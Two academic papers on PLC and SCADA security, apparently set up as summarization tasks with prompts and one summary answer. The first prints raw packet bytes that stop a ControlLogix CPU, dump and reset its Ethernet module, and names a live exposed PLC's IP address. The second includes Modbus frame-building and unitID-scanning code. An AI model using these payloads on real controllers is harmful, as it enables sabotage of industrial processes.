previously published tool PLCinject to run the experiments. We finally suggest some potential mitigation approaches to secure systems against such threats.
|
Summarize:
Keywords: embedded software, information security, manufacturing automation, PLC

Stevan A. Milinković, School of Computing, Knez Mihailova 6/VI, 11000 Belgrade, Serbia (e-mail: smilinkovic@raf.edu.rs). Ljubomir R. Lazić, State University of Novi Pazar, Vuka Karadžića bb, 36300 Novi Pazar, Serbia (e-mail: llazic@np.ac.rs).

I. INTRODUCTION

Introduced in the late 1960s, Programmable Logic Controllers (PLCs) were designed to eliminate the high cost of complicated, relay-based control systems. By the 1980s, Distributed Control Systems (DCS) achieved popularity within increasingly automated plant environments, with keyboards and workstations replacing large, individual control cabinets. Entire production lines and processes could be linked over industrial cable/bus networks to provide monitoring and control at a foreman's desk. The available systems were in every sense proprietary, capturing market share by staying incompatible with competitive systems. In the early 1980s a strategy to decentralize proprietary process control systems emerged and spawned the Fieldbus wars. Thus began the unraveling of central control strategies, with a vision towards driving more intelligence into each field device and utilizing non-proprietary technology.

Today, almost every PLC, DCS, Remote Terminal Unit (RTU), or Safety Integrated System (SIS) controller on the market has a commercial operating system in it. For some examples, see Table 1. Microsoft Windows vulnerabilities abound and are reported in various resources on the Internet. The same holds for Linux and QNX. As for OS-9 and VxWorks, these operating systems are not as famous as Windows or Linux, and consequently their bugs and vulnerabilities are less well known. However, vulnerabilities are still there, and here are some examples. Microware OS-9 [1] is a multi-user, multi-tasking UNIX-like operating system. It has been shown to be susceptible to attacks using ICMP redirects.
An attacker could forge ICMP redirect packets and possibly alter the host routing tables, subverting security by causing traffic to flow on a path the network manager did not intend.

TABLE 1: OPERATING SYSTEMS OF SOME COMMERCIAL PLCS
PLC                          Operating System
Allen-Bradley PLC5           Microware OS-9
Allen-Bradley ControlLogix   VxWorks
Emerson DeltaV               VxWorks
Schneider Modicon Quantum    VxWorks
Yokogawa FA-M3               Linux
Wago 750                     Linux
PLC reference platform       QNX Neutrino
Siemens SIMATIC WinAC RTX    Microsoft Windows

VxWorks (a product of Wind River Systems, acquired by Intel in 2009) is a more famous embedded real-time operating system. It has been used to power everything from Apple AirPort Extreme access points and the BMW iDrive to the Mars rovers and the C-130 Hercules aircraft. Unfortunately, it has two serious flaws, described in [2, 3].

The first flaw concerns an exposed VxWorks debug service (WDB agent). This service runs over UDP port 17185 and allows complete access to the device, including the ability to manipulate memory, steal data, and ultimately hijack the entire operating system. This service was inadvertently left exposed by over 100 different vendors and affects at least 250,000 devices sitting on the Internet today.

The second flaw relates to a weak password hashing implementation in the VxWorks operating system. Any device that uses the built-in authentication library to handle Telnet and FTP authentication can be compromised. The flaw occurs because there are only 210,000 possible hash outputs for all possible passwords. An attacker can simply cycle through the most common ranges of hash outputs with about 8,000 work-alike passwords to gain access to a VxWorks device. Using the FTP protocol, this attack would take only about 30 minutes to try all common password permutations.

Schneider Modicon devices are a story of their own. It can easily be seen directly from Schneider's firmware that there are a huge number of hard-coded accounts in the devices.
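A quick back-of-envelope check of the VxWorks loginLib figures quoted above (210,000 distinct hash outputs, roughly 8,000 work-alike passwords, about 30 minutes over FTP); the numbers come from the text, the arithmetic is ours:

```python
HASH_SPACE = 210_000        # distinct loginLib hash outputs
WORK_ALIKES = 8_000         # common work-alike passwords to try
ATTACK_MINUTES = 30         # quoted duration of the FTP attack

# Implied attempt rate: fewer than five guesses per second suffice,
# which is easily achievable over an unthrottled FTP login prompt.
attempts_per_second = WORK_ALIKES / (ATTACK_MINUTES * 60)

# Fraction of the entire hash space covered by those guesses.
coverage = WORK_ALIKES / HASH_SPACE
```

The low required guess rate is what makes the weakness practical: no lockout mechanism needs to be defeated, only patience measured in minutes.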
These accounts let a user do anything to the device, i.e., they all have the same privileges. For example, you can upload new firmware to the device and use the Ethernet module in a Modicon as a general-purpose computer; you can even run Linux on it. Schneider left debugging symbols in the firmware, which are pretty easy to reverse engineer. Some documented Schneider Modicon vulnerabilities are reported in [4, 5].

Industrial PLC security issues. Stevan A. Milinković, Member, IEEE, and Ljubomir R. Lazić, Member, WSEAS. 20th Telecommunications Forum TELFOR 2012, Belgrade, Serbia, November 20-22, 2012. 978-1-4673-2984-2/12/$31.00 © 2012 IEEE.

II. CASE STUDY

The Allen-Bradley Logix family comprises the most full-featured programmable controllers in the Rockwell Automation line. The ControlLogix is the flagship product of the Logix family. A ControlLogix consists of a chassis with controller, power supply, and I/O modules, and can be used as both a controller and a gateway. The number and type of modules is determined by the size and type of system being controlled, network topologies and protocols, and redundancy requirements. ControlLogix configurations can vary greatly, given the large number of modules and the ability to mix and match to meet requirements. The 1756-ENBT and 1756-EWEB (which includes a web server) modules provide an Ethernet connection to the ControlLogix and warrant special attention from an information security perspective. A wide range of control system protocols are supported. For communication with a server, HMI, or other controllers, the ControlLogix supports EtherNet/IP, ControlNet, and Data Highway, as well as other standard protocols from third-party modules such as Modbus TCP.
Protocol support for I/O communication includes EtherNet/IP, ControlNet, and DeviceNet, plus HART, Foundation Fieldbus, and other standard protocols. Since this is a popular controller platform, there is a good chance that most control system protocols are supported directly by Rockwell Automation or by a third-party product that can be integrated into the ControlLogix platform. As more capabilities are pushed out to devices like the ControlLogix, they become a more crucial component in a control system and a bigger target. One of the simplest means to secure a ControlLogix is to physically place the controller modules into Run mode and remove the physical key. Unfortunately, this prevents remote management and viewing of the configuration.

A. Available Services

The 1756-ENBT/A brings Ethernet connectivity to the controller, thus opening the door to a whole range of remote attack vectors. For example, via nmap (snmp-netstat):

TCP 0.0.0.0:80     ; http (GoAhead)
TCP 0.0.0.0:111    ; rpcbind
TCP 0.0.0.0:44818  ; EtherNet/IP
UDP 0.0.0.0:68     ; dhcp (if enabled)
UDP 0.0.0.0:111    ; rpcbind
UDP 0.0.0.0:161    ; snmp
UDP 0.0.0.0:2222   ; EtherNet/IP
UDP 0.0.0.0:44818  ; EtherNet/IP

Port 44818 is used by the Rockwell Automation software (RSLogix, RSLinx) drivers to communicate via Explicit Messages with those ControlLogix controllers that have EtherNet/IP modules enabled. EtherNet/IP is an application-layer protocol treating devices on the network as a series of "objects". It is built on the Common Industrial Protocol (CIP), for access to objects from ControlNet and DeviceNet networks. RSLogix, RSLinx, and other Rockwell software can easily be downloaded from Rockwell's support website. By interacting with this software while monitoring the network traffic, we can easily analyze and extract the packets needed to monitor and control the PLC, i.e., obtain information about the processes running on the CPU or update the firmware.

B.
Live System

With a little help from the Shodan search engine [6], it is easy to find ControlLogix devices on the web. The first site we found was www.scrapmetal.net (American Iron & Metal Co. Inc.). We get there immediately when we enter http://204.101.14.75/index.html in our browser. It is a 1756-ENBT/A web page with a completely operational menu on the left side, including full diagnostics and a refresh rate of 15 seconds. It can easily be seen that the firmware date is Jan 7, 2005. This is valuable information for someone who wants to prepare an attack on the device. The ControlLogix uses the GoAhead web server, a simple, portable, and compact web server for embedded devices and applications. It is one of the most widely deployed web servers and is embedded in hundreds of thousands of devices. Unfortunately, this web server contains vulnerabilities that may allow an attacker to view source files containing sensitive information or bypass authentication [7].

C. Configuration

All configuration is done via EtherNet/IP, for example using the RSLogix desktop software. Authentication is optional, which means that brute-forcing is possible, because there are no timeouts/lockouts. Moreover, many functions do not require authentication at all, so we can perform attacks as in the following examples [8].

D. Forcing the CPU to Stop

Stops the CPU, leaving it in a Major Recoverable Fault state. In order to clear the fault, the key needs to be turned manually from RUN to PROG twice.

// CIP - Unconnected Send, via 0x52 command
// Service: 0x7 (STOP)
// Class: 0x64
unsigned char packetCPUStop[] =
    "\x00\x00\x00\x00\x02\x00\x02\x00"
    "\x00\x00\x00\x00\xB2\x00\x1A\x00"
    "\x52\x02\x20\x06\x24\x01\x03\xF0"
    "\x0C\x00\x07\x02\x20\x64\x24\x01"
    "\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00"
    "\x01\x00";

E.
Dump the 1756-ENBT Module Boot Code

An undocumented service allows remotely dumping the EtherNet/IP module's boot code.

// CIP - Unconnected Send
// Service: 0x97
// Class: 0xC0
unsigned char packetDump[] =
    "\x00\x00\x00\x00\x00\x04\x02\x00"
    "\x00\x00\x00\x00\xB2\x00\x08\x00"
    "\x97\x02\x20\xC0\x24\x00\x00\x00";

F. Reset the 1756-ENBT Module

Resets the EtherNet/IP module.

// CIP - Unconnected Send
// Service: 0x5 (RESET)
// Class: 0x01 (Identity Manager)
unsigned char packetResetEth[] =
    "\x00\x00\x00\x00\x00\x04\x02\x00"
    "\x00\x00\x00\x00\xB2\x00\x08\x00"
    "\x05\x03\x20\x01\x24\x01\x30\x03";

III. OTHER PLC DEVICES

Project Basecamp researchers tested vulnerabilities of selected PLCs from major vendors, and the results were presented at the S4 2012 meeting [9]. Each PLC was tested against the following:
- Upload custom firmware
- Upload and download ladder logic
- Backdoors
- Basic fuzz testing (providing invalid, unexpected, or random data as input)
- Web server vulnerabilities
- Spoof authentication / replay configuration
- Resource exhaustion attack
- Undocumented functionality/protocols

Tested devices were: Allen-Bradley ControlLogix (AB), Schneider Modicon Quantum (Mod), General Electric D20ME (GE), Schweitzer SEL-2035 (SEL), and Koyo Direct Logic H4-ES (Koyo). A summary of the test results is given in Table 2. An "x" indicates the vulnerability is present in the system and easily exploited; an exclamation point ("!") indicates the vulnerability exists but is difficult to exploit; a checkmark ("✓") indicates the system lacks this vulnerability.

TABLE 2: THE VULNERABILITY TYPES FOUND IN PLCS
               AB   Mod  GE   SEL  Koyo
Firmware       !    x    !    !    !
Ladder logic   !    !    x    !    x
Backdoors      !    x    x    ✓    ✓
Fuzzing        x    x    x    !    !
Web            !    x    N/A  N/A  x
Configuration  !    !    x    !    !
Exhaustion     ✓    ✓    x    ✓    ✓
Undocumented   !    x    x    !    !
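The raw CIP frames shown in subsections D-F can be assembled and sanity-checked offline before ever touching a device. The sketch below (Python rather than C, purely for illustration) rebuilds the stop-CPU frame byte for byte; it does not transmit anything, though on a live system the frame would travel over EtherNet/IP (TCP port 44818).

```python
# The "Forcing the CPU to Stop" frame from subsection D, rebuilt as bytes.
STOP_CPU = bytes([
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x02, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xB2, 0x00, 0x1A, 0x00,
    0x52, 0x02, 0x20, 0x06, 0x24, 0x01, 0x03, 0xF0,
    0x0C, 0x00, 0x07, 0x02, 0x20, 0x64, 0x24, 0x01,
    0xDE, 0xAD, 0xBE, 0xEF, 0xCA, 0xFE, 0x01, 0x00,
    0x01, 0x00,
])

UNCONNECTED_SEND = STOP_CPU[16]   # 0x52: CIP Unconnected Send service
EMBEDDED_SERVICE = STOP_CPU[26]   # 0x07: the embedded STOP service
TARGET_CLASS = STOP_CPU[29]       # 0x64: the class being addressed
```

Checking the service and class bytes against the comments in the original C arrays is a cheap way to catch transcription errors in such hand-built frames.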
Add to this the Siemens PLC, described widely in the literature, that was targeted by the Stuxnet worm [7], a sophisticated piece of malware discovered last year that was designed to sabotage Iran's uranium enrichment program. It can be concluded that all products are susceptible to internal and external attacks, and that these attacks do not require any significant level of expertise on the part of the attacker. The key point in attacking a PLC is not always how to circumvent its security, but monitoring how the legitimate software performs valid operations in order to mimic them, in addition to the usual dose of reverse engineering and fuzzing to discover the secrets behind the scenes. Today malware has become increasingly sophisticated, targeting specific applications on the infected host, so it is not inconceivable for a piece of malware to alter or delete a Human-Machine Interface (HMI), control application, Open Process Control (OPC) server, or data historian. Many people are focused on the Windows zero-days, but those were simply a delivery vehicle [10]. More dangerous payloads affect the controller by changing the controller logic. Therefore, security for control systems should not be approached in the context of IT. As things stand, however, the security requirements are based not on what it takes to secure a control system against control system threats, but on what it takes to secure IT systems (Windows servers and PCs) used in control system applications against IT threats. Industrial Control System (ICS) devices, which have proven safe and reliable for years, have been accused of failures in security. The devices are really good: well-designed, reliable, and safe systems. They were never meant to be security systems, but now they are being accused of not doing what they were not designed to do.
As a matter of fact, the most significant difference between the industrial and corporate IT domains is the high-availability requirement for monitoring and control functionality (Fig. 1).

Fig. 1. Security goals are prioritized differently for general IT and ICS

IV. THE SOLUTION

With the competitive pressure that most companies face to improve productivity and access to the data in their plants, it is unlikely that engineers will be able to significantly reduce the number of internal and external pathways into their facilities. Furthermore, the use of modern IT technologies now requires a steady stream of electronic data onto the plant floor as well. These often take the form of upgrades, patches, process recipes, and remote support connections, all of which pose a security risk. Aggressive patching strategies do help reduce the risk of exposed operating system vulnerabilities, but most plant operators are dependent on their industrial control systems equipment vendors to secure the actual controllers and software products. Unfortunately, this has met with limited success. As of December 2011, the US ICS-CERT had published 137 advisories on control system products with known security vulnerabilities.

The good news is that engineers can address these issues by using the strategies outlined in the ANSI/ISA-99 standards: Security for Industrial Automation and Control Systems [11]. The ANSI/ISA-99 standards introduce the concepts of zones and conduits as a way to segment and isolate the various subsystems in a control system. A zone is defined as a grouping of logical or physical assets that share common security requirements based on factors such as criticality and consequence. Equipment in a zone has a security level capability.
If that level is not equal to or higher than the required level, extra security measures must be taken. Any communication between zones must be via a defined conduit. Conduits control access to zones, resist denial-of-service attacks or the transfer of malware, shield other network systems, and protect the integrity and confidentiality of network traffic. Typically, the controls on a conduit are intended to mitigate the difference between a zone's security level capability and its security requirements. Focusing on conduit mitigations is typically far more cost effective than having to upgrade every device or computer in a zone to meet a requirement. It is important to understand that the ANSI/ISA-99 standards do not specify exactly how a company should define its zones or conduits. Instead, the standard provides requirements based on a company's assessment of its risk from an attack. Since risk is a function not only of the possibility of an incident but also of its consequences, the zones and conduits and the protection needed for each will vary for each facility. Table 2 lists some of the sub-sections in the document that address network segmentation using zones and conduits for Industrial Automation and Control Systems (IACS).

TABLE 2: KEY ZONE AND CONDUIT REQUIREMENTS FROM ANSI/ISA-99.02.01 FOR IACS
- Develop the network segmentation architecture: A network segmentation countermeasure strategy employing security zones shall be developed for IACS devices based upon the risk level of the IACS.
- Employ isolation or segmentation on high-risk IACS: Any high-risk IACS zone shall be either isolated from, or employ a barrier device to separate it from, other zones with different security policies, levels, or risks.
The barrier device shall be selected commensurate with the risk reduction required.
- Block non-essential communications with barrier devices: Barrier devices shall block all non-essential communications into and out of the security zone containing critical control equipment.

Once the conduits and their security requirements are defined, the final phase is to implement the appropriate security technologies. There are two popular options for this stage:

Firewalls: These devices control and monitor traffic to and from a zone. They compare the traffic passing through against a predefined security policy, discarding messages that do not meet the policy's requirements. Typically they are configured to pass only the minimum traffic required for correct system operation, blocking all other unnecessary traffic. They can also filter out high-risk traffic, such as programming commands or malformed messages that might be used by hackers to exploit a security hole in a product. Industrial firewalls are designed to be very engineer-friendly and are capable of detailed inspection of protocols such as DNP3, EtherNet/IP, and Modbus/TCP.

VPNs (Virtual Private Networks): These are networks layered onto a more general network using encryption technology to ensure private transmission of data and commands. VPN sessions tunnel across a transport network in an encapsulated format, making them invisible to devices that do not have access to the VPN members' secret keys or certificates.

The whole zone-and-conduit approach implements a strategy of defence in depth, with multiple layers of defence distributed throughout the control network, which the IT community has proven to be a strategy that works well. In contrast, the so-called air gap does not work at all, yet it lulls us into a false sense of security.

V. CONCLUSION

Until recently, few people knew about PLC vulnerabilities and attack tools.
This all changed when Stuxnet came out: now every hacker in the world knows about PLCs, HMIs, and the opportunities to attack them. Worse still, it showed the world that finding a zero-day vulnerability is not even required to attack most PLCs; you just need to get a foothold in a computer that communicates with a PLC. It is time to start protecting industrial controllers. There is no silver bullet, but we believe that shielding them with firewalls and VPNs from all other equipment on the network, including the HMIs, is an important start.

ACKNOWLEDGEMENT

The results presented in this paper are part of the research supported by the Ministry of Education and Science of the Republic of Serbia, Grants No. III-45003 and TR-35026.

REFERENCES
[1] J. Russell and R. Cohn, OS-9, Bookvika Publishing (Wikipedia articles), 2012.
[2] US-CERT Vulnerability Note #362332: Wind River Systems VxWorks debug service enabled by default, 23 July 2012.
[3] US-CERT Vulnerability Note #840249: Wind River Systems VxWorks weak default hashing algorithm in standard authentication API (loginLib), 10 May 2012.
[4] ICS-ALERT-11-346-01: Schneider Electric Quantum Ethernet Module Multiple Vulnerabilities, December 12, 2011.
[5] ICS-ALERT-12-020-03: Schneider Electric Modicon Quantum Multiple Vulnerabilities, January 20, 2012.
[6] ICS-ALERT-10-301-01: Control system Internet accessibility, October 28, 2010.
[7] US-CERT Vulnerability Note #975041: GoAhead Web Server discloses source code of ASP files via crafted URL, 11 Jan 2010.
[8] R. Santamarta, Attacking ControlLogix, Digital Bond Project Basecamp, 2012. Available: http://www.reversemode.com/
[9] R. Wightman, Project Basecamp at Digital Bond's SCADA Security Scientific Symposium (S4), Miami Beach, USA, January 18-19, 2012.
[10] R. Langner, Robust Control System Networks, New York, NY: Momentum Press, 2011.
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:35:00 UTC from IEEE Xplore. Restrictions apply.
Summary:
In this paper we have shown that PLC devices are complex embedded systems often relying on some operating system. They are plagued by the same sorts of vulnerabilities and exploits as general-purpose operating systems. In fact, the number of latent vulnerabilities in the typical microprocessor-based device can be surprisingly high. However, we don't need bugs or vulnerabilities in order to attack the PLC: we can exploit its normal operation, provided we have some access to the device. It is suggested that one of the effective ways to avoid expensive business losses or production disruption due to misuse of the PLC is to start protecting the system with defence-in-depth measures.
|
Summarize:
Keywords Industrial Control Systems, SCADA, Security I. INTRODUCTION Supervisory Control and Data Acquisition (SCADA) systems are used to manage and automate processes in critical infrastructures such as electricity grids or water distribution facilities. According to the ISA definition [1], SCADA-based Industrial and Automation Control Systems (IACS) are structured into five distinct levels: level 0, reserved for the sensors and actuators; level 1, which contains devices such as Programmable Logic Controllers (PLCs) and Remote Terminal Units (RTUs); level 2, composed of supervisory control equipment such as the Human-Machine Interface (HMI); level 3, for the Manufacturing Execution Systems (MES), such as the systems hosting production planning software; and level 4, for the remaining business-related systems. The interconnection of level 0 and level 1 devices (e.g. PLCs and RTUs) and the interconnection of level 1 devices with level 2 devices (e.g. HMIs) are probably the most vulnerable points of IACS infrastructures. They were traditionally isolated and based on proprietary protocols and technologies without intrinsic security capabilities, relying on obscurity and air-gapping principles for that purpose. Nevertheless, with the progressive adoption of Ethernet- and TCP/IP-based networks, standardized SCADA protocols and VPN-based remote access (to reduce maintenance costs), these networks are more connected than ever to the remaining infrastructure, the corporate network and even the Internet, either by sharing physical network and computing resources or via (not foolproof) interconnection firewalls, routers or gateways. This paradigm change drastically increases the risks, due to the increased system complexity, the introduction of new attack vectors and the amplified exposure of existing security vulnerabilities. SCADA systems are intrinsically different from traditional ICT systems [2].
Automated real-time physical processes do not need high throughput but demand continuous availability with guaranteed low delay and low jitter. Moreover, their primary focus is on availability and service continuity, as opposed to classic ICT systems, where information confidentiality and integrity come first [3]. SCADA systems also have much longer lifetime cycles, due to their high upgrade costs, easily reaching obsolescence by ICT standards. Even simple security patches take much longer to deploy, due to the need for prior testing and certification. Recognizing those specificities and risks, as well as the tremendous impact they can have on SCADA-based critical infrastructures such as energy grids, water distribution systems, transportation systems or factory plants, there is currently a strong investment in research towards enhancing the security of (both legacy and more recent) SCADA systems. There is an extensive literature researching various approaches for introducing IACS-specific intrusion detection mechanisms, as well as for improving the intrinsic security of SCADA systems. However, due to logistic constraints and the difficulty of using real-world production systems for research purposes, not many works are based on wider testbed scenarios reproducing real infrastructures, instead using very simplified test benches or general-purpose datasets. Among these, the large majority is focused on the defensive perspective of the targeted infrastructure, instead of the attacker's point of view. While this is understandable, considering how difficult it is to build larger, more realistic testbeds and the fact that the researchers' aim is to improve SCADA systems' cyber-security awareness and capabilities, we believe it is also important to grasp the attacker's perspective, including the challenges he faces to implement a successful attack.
In this paper, we provide a practical description of somewhat representative cyber-attacks (network-based enumeration, communication hijacking and service disruption) targeting SCADA systems within a testbed that represents an electricity grid (regional network of medium and high voltage distribution). This testbed consists of a hybrid environment that includes real networking and SCADA assets (e.g. PLCs, HMIs, process control servers) controlling an emulated power grid (so we can assess the possible impact of these attacks on the physical world). We explain those attacks and discuss some of the challenges faced by an attacker to implement them. This work was performed in the scope of the CockpitCI [4] and ATENA [5] research projects, which aim at providing a holistic approach to security, safety and resilience of energy distribution grids, including the detection and prevention of cyber-attacks and the analysis of the mutual interdependency between their ICT assets (communications network, servers, SCADA control applications, PLCs and RTUs) and the energy side (e.g. transmission lines, substations, power transformers and generators, quality of energy service). Detection of cyber-attacks and situational awareness is a key part of these projects, and as such we built a specialized detection layer that has been extensively described and evaluated in previous works (e.g. [6-7]). This paper complements them by focusing not so much on the detection and mitigation solutions, but rather on the process of preparing and executing the attacks used for validation purposes. For the sake of readability and representativeness, we decided to focus on simple, classic attacks, instead of more complex actions. The rest of the paper is organized as follows. In the next section, we discuss related work.
978-3-901882-89-0 ©2017 IFIP. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:15 UTC from IEEE Xplore. Restrictions apply.
Section III introduces the testbed environment we used. The implemented cyber-attacks are discussed in Section IV, and Section V concludes the paper. II. RELATED WORK As already mentioned, existing research literature discusses different types of cyber-attacks against SCADA systems, such as Denial of Service (DoS) attacks [8-10], Man-in-the-Middle (MitM) attacks [11-12] or malware-based attacks [13]. Nevertheless, those discussions are usually focused on the defense mechanisms (and not on the attacks), are based on small and/or simulated scenarios, or lack detail on the practical implementation of the attack. Post-incident research on real-world attacks is a valuable source. Ralf Langner's report on the well-known Stuxnet malware [14] targeting Iran's nuclear facilities is a good example of such sources. Other well-covered high-profile incidents include the Duqu malware [15] or the 2015 BlackEnergy attack, allegedly responsible for power outages in the Ukrainian power grid [16]. These sources have the advantage of being based on real, successful attacks, but are usually limited to the analysis of complex high-profile incidents, often supported by nation-state resources, instead of simpler but representative attack profiles. III. TARGET ENVIRONMENT A. HEDVa Testbed With the purpose of supporting the demonstration and validation of the CockpitCI framework, a testbed reproducing a regional-scale energy distribution network was built by Israel Electric Corporation (IEC). From the ICT and SCADA perspectives, this testbed is composed of real assets, including IT network, control and field level components, servers and services that typically integrate such a system. Within this scenario, an electrical distribution grid topology was entirely emulated using specialized software developed at IEC, given the practical impossibility of using a real, large-scale energy distribution infrastructure (composed of many substations and hundreds of kilometers of power lines).
This approach results in a hybrid testbed, where all ICT and SCADA components are real and believe they are monitoring and controlling a real energy grid. This is achieved by using an agent-based grid simulation model that uses real PLC equipment to emulate elements such as feeders or circuit breakers. The interface between the real and emulated domains of the grid scenario includes all the monitoring data and controls that would exist in a real operational environment. Figure 1 provides an overview of this testbed (designated as HEDVa: Hybrid Environment for Design and Validation), of which only a subset will be relevant to the scope of this paper. By using such an environment, it became possible to research more complex interdependencies between different components (e.g. network, SCADA devices) and different domains (e.g. the impact of ICT faults on the quality of energy at different points of the grid). Furthermore, having a real deployment of ICT and SCADA systems allowed more realistic assessments and the collection of more extensive and realistic validation data. Figure 1: Overview of the HEDVa Testbed [6] B. The Modbus Protocol Among the wide range of different SCADA protocols available, the HEDVa Testbed uses Modbus over TCP/IP [17-18]. Modbus is a protocol used to query field data using a polling client/server approach. Communication is based on query/response transactions, identified by a transaction ID field and distinguished by a function code field. According to the Modbus data model, different types of tables are mapped into the PLC memory (such as discrete inputs, coils or holding registers). These values are queried via their respective function code and memory address (see Figure 2). There is no built-in mechanism (or fields) for authentication, authorization or encryption.
2017 IFIP/IEEE International Symposium on Integrated Network Management (IM2017): Experience Session - Full Paper
Hence, without proper security enforcement in the remaining network stack, it becomes possible to dissect the Modbus messages' payload (i.e. critical information from a physical process). Figure 2: Example of the interaction between two Modbus devices. Forging communication or field data is also possible by simply crafting a valid value for the transaction ID field (see Figure 3), as this value is frequently predictable (due to lack of randomness in poor Modbus implementations) or even blindly discarded by some Modbus implementations. Moreover, Modbus/TCP runs on top of non-encrypted TCP sessions. Figure 3: Modbus frame and header format. Even considering the real-time nature of the underlying processes, the polling-based mechanism provided by the Modbus protocol is not effectively real-time. The intervals between each request directly impact the delay between a change in the physical process and the time the change is observed by the HMI operator. This results in a small but viable time window for hijacking communications before the operator and/or the HMI application notice any changes. Despite all these security vulnerabilities of Modbus apparently making the attacker's work too easy, Modbus holds a significant market share (over 20%, considering all its variations [19]), and many of the other protocols are not much different. This means the testbed represents a large subset of the systems currently in operation. Several open-source components can be used to build Modbus hacking tools, such as Nmap's modbus-discover script [20] or Modscan [21], which allows mapping and enumerating PLCs using Modbus over TCP within a network by exploring their replies.
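The frame layout described above (MBAP header followed by a function-code PDU, with no authentication field anywhere) can be sketched with Python's standard `struct` module. This is a minimal illustration of the format, not the tooling used in the paper; all values are examples.

```python
import struct

def build_modbus_request(transaction_id: int, unit_id: int,
                         function_code: int, start_addr: int, count: int) -> bytes:
    """Build a Modbus/TCP request: MBAP header + PDU.

    MBAP header fields: transaction ID, protocol ID (always 0),
    length of the remaining bytes, and unit ID. Note there is no
    field for authentication, authorization or integrity protection.
    """
    pdu = struct.pack(">BHH", function_code, start_addr, count)
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu

# Read 2 holding registers (function code 3) at address 0 from unit 1.
frame = build_modbus_request(transaction_id=1, unit_id=1,
                             function_code=3, start_addr=0, count=2)
print(frame.hex())  # 000100000006010300000002
```

Because every field is plain, predictable binary, forging a frame with a plausible transaction ID, as discussed above, is a matter of a few lines of code.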
Another example is a Python library extended from Scapy (a widely-used packet manipulation framework, easy to extend and integrate with other applications) that contains Modbus-specific functions to easily craft Modbus frames [22]. The next section discusses the execution of a series of attacks, which also served for validating the proposed DIDS. IV. ATTACK STAGING AND EXECUTION All the attack scenarios assumed the attacker had access to the process control network (e.g. as a result of a compromised host; this step, which corresponds to the initial exploitation of the attack, was intentionally omitted). For practical demonstrations, a dedicated host was deployed on the HEDVa to serve as a base for the attacker, which could be easily relocated on the infrastructure, since it was hosted on a virtual machine. A similar attack strategy could be implemented (with the proper adjustments) to trigger an attack (for instance, forging or sending Modbus packets) directly from a compromised HMI or other component. A three-stage attack strategy was devised, pursuing the following goals: monitoring the process values (to gain knowledge about the nature and characteristics of the controlled process), changing them without being noticed in the SCADA HMI consoles and, finally, inducing service disruption on the energy grid. These should cover a large subset of a cyber-attack targeting a SCADA system. A by no means exhaustive list of the implemented attacks includes classical and Modbus-specific scans, different variants of denial-of-service attacks based on network floods, and a SCADA-specific MitM specifically customized for this process environment. Next, we describe some of those attacks. A.
The HEDVa use case scenario for attack implementation For the sake of readability, we'll describe the attacks using a subset of the HEDVa testbed, configured to emulate an electricity distribution grid composed of two energy feeders and several circuit breakers, controlled by real Modbus PLCs (see Figure 4). Several HEDVa assets, including services, equipment (such as network switches and PLCs), servers (both physical and virtualized) and networks are also part of this use case. The PLCs and the remaining elements of the SCADA infrastructure in charge of the emulated grid are connected using an Ethernet LAN infrastructure (using VLAN segmentation for domain separation). Figure 4: Representation of the electrical grid use case scenario (Modbus PLCs, two energy feeders, circuit breakers; all measure voltage and current). The scenario deployed on the HEDVa (see Figure 5) includes two Human Machine Interface (HMI) hosts, controlling and supervising the PLCs, an OPC server, a dedicated database for past events and offline analysis, and a deployment of the CockpitCI DIDS (not depicted). However, the DIDS security detection components didn't play any active role: they were used to observe and document the attacks, without interfering with the attacker's actions. This scenario not only offered the means to validate the CockpitCI DIDS, but also the opportunity to implement and analyze a series of security strategies. For the
latter purpose, and complementary to the classic penetration testing and auditing procedures, a series of team drills were executed to obtain relevant data on the most effective tactical defensive and offensive strategies. Figure 5: Reference scenario for the use cases (HMI1, HMI2, SCADA/OPC server, security gateway/router, NIDS, attacker and switches). Besides these efforts, the acquisition of relevant datasets for development, training and offline evaluation of anomaly detection methods was also another important role of the HEDVa scenario. For capturing all the network interactions for further analysis, a centralized network point of capture was configured. This was achieved using port monitoring/mirroring in the switch layer, as opposed to a distributed packet acquisition solution, to avoid all the issues with duplicated packets or timestamp synchronization. B. Network Reconnaissance Network scouting is one of the first steps of an attack, meant to gather information about all the components of the target environment, to discover and identify topologies, hosts and services. For instance, traditional network components such as HMIs are identified by IP and MAC addresses, operating system versions and a set of services (using techniques such as FIN scans, see Figure 6); in such cases, the specific service footprint, together with TCP fingerprinting data, is useful to identify specific components or software implementations. Figure 6: First step of a Network/Modbus scan. In addition to that, each PLC is also identified and addressed by the unitID field, part of the Modbus frame (see Figure 7). For simple scenarios where one IP address corresponds to one PLC, the unitID can be set to a fixed known value (typically 1) or may be ignored by the Modbus implementation. Nevertheless, a Modbus gateway, using only one IP address, may hide several PLCs with different unitIDs.
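A unitID sweep of the kind described above can be sketched using only the Python standard library. This is an illustrative sketch, not the tool used in the paper: the host, port and unitID range are assumptions, and the network-facing `sweep` function is shown but only the offline reply classifier is exercised here.

```python
import socket
import struct

def probe_frame(tid: int, unit_id: int) -> bytes:
    """Minimal 'read holding registers' probe for one unitID."""
    pdu = struct.pack(">BHH", 0x03, 0, 1)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit_id) + pdu

def classify_reply(reply: bytes) -> str:
    """Interpret a Modbus/TCP reply to decide whether a unitID is live.

    A function code with the high bit set (>= 0x80) is an exception
    response: the device rejected the request, but that still confirms
    a live unitID behind the address (e.g. behind a Modbus gateway).
    """
    if len(reply) < 8:
        return "no-device"
    function_code = reply[7]
    return "exception" if function_code >= 0x80 else "ok"

def sweep(host: str, port: int = 502, unit_ids=range(1, 248)):
    """Send one probe per unitID (247 is the Modbus maximum). Illustrative."""
    live = []
    for tid, uid in enumerate(unit_ids, start=1):
        with socket.create_connection((host, port), timeout=1) as s:
            s.sendall(probe_frame(tid, uid))
            if classify_reply(s.recv(260)) != "no-device":
                live.append(uid)
    return live

# Offline check of the classifier: 0x83 = exception response to function 3.
fake_exception = bytes.fromhex("000100000003") + bytes([1, 0x83, 0x02])
print(classify_reply(fake_exception))  # exception
```

This mirrors what tools like Nmap's modbus-discover script do: probing each unitID and treating any well-formed reply, including exceptions, as evidence of a device.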
